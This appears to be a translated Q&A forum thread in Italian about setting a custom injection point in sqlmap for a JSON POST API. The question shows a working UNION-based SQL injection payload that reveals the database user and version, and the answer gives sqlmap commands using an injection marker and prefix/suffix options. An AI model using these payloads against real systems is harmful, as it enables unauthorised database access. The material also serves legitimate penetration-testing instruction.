Come utilizzare l'iniezione personalizzata in sqlmap?

0

Questo è un dato post, normalmente appare come questo

{"end_date":"2018-8-26","start_date":"2018-8-26","success":1}

Di seguito risultante "Hai un errore ..."

{"end_date":"2018-8-26'","start_date":"2018-8-26","success":1}

Qui sotto correttamente stampa la versione db e la versione utente

{"end_date":"00:00:00') union select 1,user(),version();--+","start_date":"","success":1}

Quello che ho fatto finora è

python sqlmap.py -u http://redacted.com/api/v1/endpoint --headers="Authorization: Bearer xxxx" --data='{"end_date":"00:00:00","start_date":"2018-8-26","success":1}' -p "end_date" --sql-query="00:00:00') union select 1,user(),version();--+" -v 3

Ma Sqlmap ha fallito ancora, dove sto sbagliando?

Grazie in anticipo.

    
posta Dark Cyber 27.08.2018 - 06:42
fonte

1 risposta

1

Potresti provare alcuni dei seguenti:

python sqlmap.py -u http://redacted.com/api/v1/endpoint --headers="Authorization: Bearer xxxx" --data='{"end_date":"00:00:00*","start_date":"2018-8-26","success":1}' --sql-query="') union select 1,user(),version();--+" -v 3

Usando l'asterisco puoi dire a sqlmap dove iniettare.

python sqlmap.py -u http://redacted.com/api/v1/endpoint --headers="Authorization: Bearer xxxx" --data='{"end_date":"00:00:00","start_date":"2018-8-26","success":1}' -p "end_date" --prefix="')" --suffix=";--+" -v 3

Puoi usare prefisso e suffisso (oltre a combinarli con l'asterisco) per dire precisamente a sqlmap dove inserire ciò che nel tuo tentativo di iniezione. Forse questo risolve già il tuo problema. Puoi anche dare un'occhiata più da vicino qui .

    
risposta data 27.08.2018 - 07:23
fonte

Leggi altre domande sui tag